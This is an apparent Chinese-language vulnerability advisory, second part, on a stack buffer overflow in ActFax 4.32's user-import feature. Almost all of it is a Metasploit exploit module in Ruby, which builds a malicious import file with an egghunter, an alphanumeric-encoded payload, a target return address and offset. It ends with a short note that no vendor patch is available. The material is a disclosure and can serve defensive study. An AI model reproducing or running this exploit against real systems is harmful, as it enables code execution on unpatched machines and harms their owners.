ActFax 'Import Users from File'函数远程栈缓冲区溢出漏(2)

'Targets'        =>
                [
                    [ 'ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1',
                        {
                            'Ret'      => 0x00401b22, # ret from ActFax.exe]
                            'Offset'  => 512
                        }
                    ]
                ],
            'Privileged'     => true,
            'DisclosureDate' => 'Aug 28 2012',
            'DefaultTarget'     => 0))

register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.exp']),], self.class)

end

def exploit

#These badchars do not apply to the final payload
        badchars = (0x00..0x20).to_a.pack("C*") + "\x7c"

eggoptions =
            {
                :checksum => true,
                :eggtag => 'w00t'
            }

hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

[ 'x86/alpha_upper'].each { |name|
            enc = framework.encoders.create(name)
            if name =~/alpha/
                enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
            end
            hunter = enc.encode(hunter, nil, nil, platform)
        }

buffer = "\x83\xC4\x7f" * 19 # add esp, byte 0xff
        buffer << "\x83\xC4\x23" # add esp, byte 0x23
        buffer << hunter
        buffer << rand_text(target['Offset'] - buffer.length, badchars)
        buffer << [target.ret].pack("V")
        buffer << egg

file =  "User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
        file << "Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
        file << "Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
        file << "Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
        file << "Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
        file << "Export Incoming\tExport-Path\tMark as Read\r\n"
        file << buffer
        file << "\r\n"

file_create(file)

end
end

建议：
--------------------------------------------------------------------------------
厂商补丁：

ActFax
------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：